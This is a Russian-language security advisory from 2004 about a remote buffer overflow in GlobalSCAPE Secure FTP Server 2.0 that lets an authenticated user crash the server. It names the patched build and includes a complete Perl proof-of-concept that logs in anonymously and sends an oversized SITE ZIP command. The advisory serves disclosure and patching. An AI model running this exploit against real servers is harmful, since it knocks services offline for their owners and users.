Дата публикации: | 19.03.2004 |
Всего просмотров: | 1205 |
Опасность: | Средняя |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Отказ в обслуживании |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | GlobalSCAPE Secure FTP Server 2.x |
Уязвимые версии: GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2
Описание: Переполнение буфера обнаружено в GlobalSCAPE Secure FTP Server. Удаленный авторизованный пользователь может аварийно завершить работу сервера. Удаленный авторизованный пользователь может послать специально сформированную команду SITE, с параметром ~252 байта, чтобы перезаписать память и аварийно завершить работу сервера. Пример/Эксплоит: #!/usr/bin/perl use IO::Socket; $host = "192.168.1.243"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2117"); unless ($remote) { die "cannot connect to ftp daemon on $host" } print "connected\n"; while (<$remote>) print $_; if (/220 /) { last; } $remote->autoflush(1); my $ftp = "USER anonymous\r\n"; print $remote $ftp; print $ftp; sleep(1); while (<$remote>) print $_; if (/331 /) { last; } $ftp = join("", "PASS ", "a\@b.com", "\r\n"); print $remote $ftp; print $ftp; sleep(1); while (<$remote>) print $_; if (/230 /) { last; } $ftp = join ("", "SITE ZIP /d:", "A"x(252), "\r\n"); print $remote $ftp; print $ftp; sleep(1); while (<$remote>) print $_; if (/250 Done/) { last; } close $remote; URL производителя: http://www.cuteftp.com/gsftps/ Решение:Установите обновленную версию программы (2.0 Build 03.16.2004.1) |
|
Ссылки: | GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling) |